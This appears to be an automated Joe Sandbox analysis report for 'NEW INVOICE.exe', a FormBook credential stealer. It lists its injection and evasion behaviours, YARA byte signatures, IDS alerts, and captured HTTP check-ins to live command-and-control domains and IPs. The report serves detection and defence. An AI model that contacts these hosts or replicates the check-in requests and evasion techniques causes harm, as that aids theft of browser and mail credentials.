Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW INVOICE.exe

Overview

General Information

Sample name:NEW INVOICE.exe
Analysis ID:1528057
MD5:4720a64fa6c2a6e20e7fcc10b4338862
SHA1:9e2746919127176a0490ff9482486ad6ae186b20
SHA256:00d402dcd4dbb6504771e48514b95e5860966119a31f19fe68905ac8a78ea09b
Tags:exeFormbookInvoiceuser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • NEW INVOICE.exe (PID: 2568 cmdline: "C:\Users\user\Desktop\NEW INVOICE.exe" MD5: 4720A64FA6C2A6E20E7FCC10B4338862)
    • svchost.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\NEW INVOICE.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • iLyDwpUmDRByL.exe (PID: 2276 cmdline: "C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setupugc.exe (PID: 3228 cmdline: "C:\Windows\SysWOW64\setupugc.exe" MD5: 342CBB77B3F4B3F073DF2F042D20E121)
          • iLyDwpUmDRByL.exe (PID: 1220 cmdline: "C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6000 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b960:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13a3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b960:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13a3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dee3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x15fc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ece3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16dc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\NEW INVOICE.exe", CommandLine: "C:\Users\user\Desktop\NEW INVOICE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW INVOICE.exe", ParentImage: C:\Users\user\Desktop\NEW INVOICE.exe, ParentProcessId: 2568, ParentProcessName: NEW INVOICE.exe, ProcessCommandLine: "C:\Users\user\Desktop\NEW INVOICE.exe", ProcessId: 5064, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\NEW INVOICE.exe", CommandLine: "C:\Users\user\Desktop\NEW INVOICE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\NEW INVOICE.exe", ParentImage: C:\Users\user\Desktop\NEW INVOICE.exe, ParentProcessId: 2568, ParentProcessName: NEW INVOICE.exe, ProcessCommandLine: "C:\Users\user\Desktop\NEW INVOICE.exe", ProcessId: 5064, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T15:05:11.041747+020028554651A Network Trojan was detected192.168.2.54988935.214.185.24380TCP
            2024-10-07T15:05:35.016494+020028554651A Network Trojan was detected192.168.2.54998145.150.55.1580TCP
            2024-10-07T15:05:51.102685+020028554651A Network Trojan was detected192.168.2.5499863.33.130.19080TCP
            2024-10-07T15:06:04.766722+020028554651A Network Trojan was detected192.168.2.549990114.134.188.18280TCP
            2024-10-07T15:06:18.125471+020028554651A Network Trojan was detected192.168.2.5499943.33.130.19080TCP
            2024-10-07T15:06:31.421364+020028554651A Network Trojan was detected192.168.2.54999876.223.105.23080TCP
            2024-10-07T15:06:45.750468+020028554651A Network Trojan was detected192.168.2.550002206.238.91.12780TCP
            2024-10-07T15:07:08.197118+020028554651A Network Trojan was detected192.168.2.550006209.74.64.19080TCP
            2024-10-07T15:07:21.445279+020028554651A Network Trojan was detected192.168.2.5500103.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T15:05:27.273907+020028554641A Network Trojan was detected192.168.2.54997645.150.55.1580TCP
            2024-10-07T15:05:29.941898+020028554641A Network Trojan was detected192.168.2.54997945.150.55.1580TCP
            2024-10-07T15:05:32.493100+020028554641A Network Trojan was detected192.168.2.54998045.150.55.1580TCP
            2024-10-07T15:05:40.513770+020028554641A Network Trojan was detected192.168.2.5499833.33.130.19080TCP
            2024-10-07T15:05:43.965996+020028554641A Network Trojan was detected192.168.2.5499843.33.130.19080TCP
            2024-10-07T15:05:45.600647+020028554641A Network Trojan was detected192.168.2.5499853.33.130.19080TCP
            2024-10-07T15:05:57.263831+020028554641A Network Trojan was detected192.168.2.549987114.134.188.18280TCP
            2024-10-07T15:05:59.556435+020028554641A Network Trojan was detected192.168.2.549988114.134.188.18280TCP
            2024-10-07T15:06:02.094553+020028554641A Network Trojan was detected192.168.2.549989114.134.188.18280TCP
            2024-10-07T15:06:11.191727+020028554641A Network Trojan was detected192.168.2.5499913.33.130.19080TCP
            2024-10-07T15:06:12.826909+020028554641A Network Trojan was detected192.168.2.5499923.33.130.19080TCP
            2024-10-07T15:06:16.433012+020028554641A Network Trojan was detected192.168.2.5499933.33.130.19080TCP
            2024-10-07T15:06:23.635744+020028554641A Network Trojan was detected192.168.2.54999576.223.105.23080TCP
            2024-10-07T15:06:26.356817+020028554641A Network Trojan was detected192.168.2.54999676.223.105.23080TCP
            2024-10-07T15:06:28.919929+020028554641A Network Trojan was detected192.168.2.54999776.223.105.23080TCP
            2024-10-07T15:06:38.117002+020028554641A Network Trojan was detected192.168.2.549999206.238.91.12780TCP
            2024-10-07T15:06:40.640941+020028554641A Network Trojan was detected192.168.2.550000206.238.91.12780TCP
            2024-10-07T15:06:43.193794+020028554641A Network Trojan was detected192.168.2.550001206.238.91.12780TCP
            2024-10-07T15:06:59.820847+020028554641A Network Trojan was detected192.168.2.550003209.74.64.19080TCP
            2024-10-07T15:07:02.380457+020028554641A Network Trojan was detected192.168.2.550004209.74.64.19080TCP
            2024-10-07T15:07:05.411171+020028554641A Network Trojan was detected192.168.2.550005209.74.64.19080TCP
            2024-10-07T15:07:14.633451+020028554641A Network Trojan was detected192.168.2.5500073.33.130.19080TCP
            2024-10-07T15:07:16.269306+020028554641A Network Trojan was detected192.168.2.5500083.33.130.19080TCP
            2024-10-07T15:07:18.912685+020028554641A Network Trojan was detected192.168.2.5500093.33.130.19080TCP
            2024-10-07T15:07:27.988484+020028554641A Network Trojan was detected192.168.2.550011118.139.176.280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: NEW INVOICE.exeReversingLabs: Detection: 23%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3879108456.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2399026834.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3882462274.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3878504026.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3880668788.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: NEW INVOICE.exeJoe Sandbox ML: detected
            Source: NEW INVOICE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: setupugc.pdb source: svchost.exe, 00000002.00000003.2366219045.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2366272278.0000000002C5B000.00000004.00000020.00020000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000004.00000002.3879594021.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iLyDwpUmDRByL.exe, 00000004.00000000.2323994616.00000000002DE000.00000002.00000001.01000000.00000005.sdmp, iLyDwpUmDRByL.exe, 00000006.00000000.2470784751.00000000002DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: NEW INVOICE.exe, 00000000.00000003.2060753924.0000000004830000.00000004.00001000.00020000.00000000.sdmp, NEW INVOICE.exe, 00000000.00000003.2061001226.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2398560256.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310891301.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309140089.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2398560256.000000000349E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3880925100.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3880925100.0000000002E8E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2398473399.0000000002853000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2401133467.0000000002B45000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: NEW INVOICE.exe, 00000000.00000003.2060753924.0000000004830000.00000004.00001000.00020000.00000000.sdmp, NEW INVOICE.exe, 00000000.00000003.2061001226.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2398560256.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310891301.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309140089.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2398560256.000000000349E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000005.00000002.3880925100.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3880925100.0000000002E8E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2398473399.0000000002853000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2401133467.0000000002B45000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: setupugc.exe, 00000005.00000002.3879319331.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3882121944.000000000331C000.00000004.10000000.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000000.2471295217.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2691444690.000000002AF0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: setupugc.exe, 00000005.00000002.3879319331.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3882121944.000000000331C000.00000004.10000000.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000000.2471295217.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2691444690.000000002AF0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: svchost.exe, 00000002.00000003.2366219045.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2366272278.0000000002C5B000.00000004.00000020.00020000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000004.00000002.3879594021.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_0036BE40 FindFirstFileW,FindNextFileW,FindClose,5_2_0036BE40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then xor eax, eax5_2_00359B80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then pop edi5_2_0035D9CB
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then mov ebx, 00000004h5_2_02BF04DE

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49889 -> 35.214.185.243:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49976 -> 45.150.55.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49981 -> 45.150.55.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 45.150.55.15:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 206.238.91.127:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 76.223.105.230:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 114.134.188.182:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 206.238.91.127:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 45.150.55.15:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 206.238.91.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 114.134.188.182:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 114.134.188.182:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 114.134.188.182:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 76.223.105.230:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 76.223.105.230:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 206.238.91.127:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 76.223.105.230:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 118.139.176.2:80
            Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
            Source: Joe Sandbox ViewASN Name: CST-AS-APCAMBODIANSINGMENGTELEMEDIACOLTDKH CST-AS-APCAMBODIANSINGMENGTELEMEDIACOLTDKH
            Source: Joe Sandbox ViewASN Name: M247GB M247GB
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /aee4/?v2x4if=ES5FzaFcHZl881dcPkloWrtYSs+NgVQDIMJFF9px4VCQZC+r8qI7xcKZuwQNqR19d0uyEXBGxed8FJi2lm9yYZ1OZE63+Pgn8NmZa2sjPIuJKsbkgLcIIc7eVTKhMDO8Pg==&bTU8=BDEpwP48zFO0YTL HTTP/1.1Host: www.aed.shoppingAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
            Source: global trafficHTTP traffic detected: GET /hi08/?v2x4if=+COrnfoiLIYpHID8Jdn5STS8mn+dG0IOSj3c7V4IL3MTuwRxXjxT14sXhAjF0/r/wZdWh4U9LEdUgjY8Z9goLxBnq4opY1y2hZAtwcDdsNM1Zv/DVnaDD1dNLgPD6a//aQ==&bTU8=BDEpwP48zFO0YTL HTTP/1.1Host: www.983743.vinAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
            Source: global trafficHTTP traffic detected: GET /6deb/?bTU8=BDEpwP48zFO0YTL&v2x4if=frbZRuXmKU61niiN8d5+MgPC6Pfs/vAzOJxU/pKZoFND5OO3a5aIko3iRqTcSjrrqUfDpbGVv4TG7n3U9jbk61XITHwlKVRh/+b6X5sz4nwuxRz0po2o/GoElcEwj6ZdbQ== HTTP/1.1Host: www.arcare.partnersAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
            Source: global trafficHTTP traffic detected: GET /n990/?v2x4if=GxIYSLz2GkLjPqt/rHopn9WrO9y33v8yD5l3ZEVwbM0FZ2j7mw+4XotPwvAai7FT8Vl9/yJfFwWFKgVG3tpm2nD6ueTLwdPoo/Wta03Cu/cEpPnD/hpbWd7xqCAhgBSZNQ==&bTU8=BDEpwP48zFO0YTL HTTP/1.1Host: www.cctv9.restAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
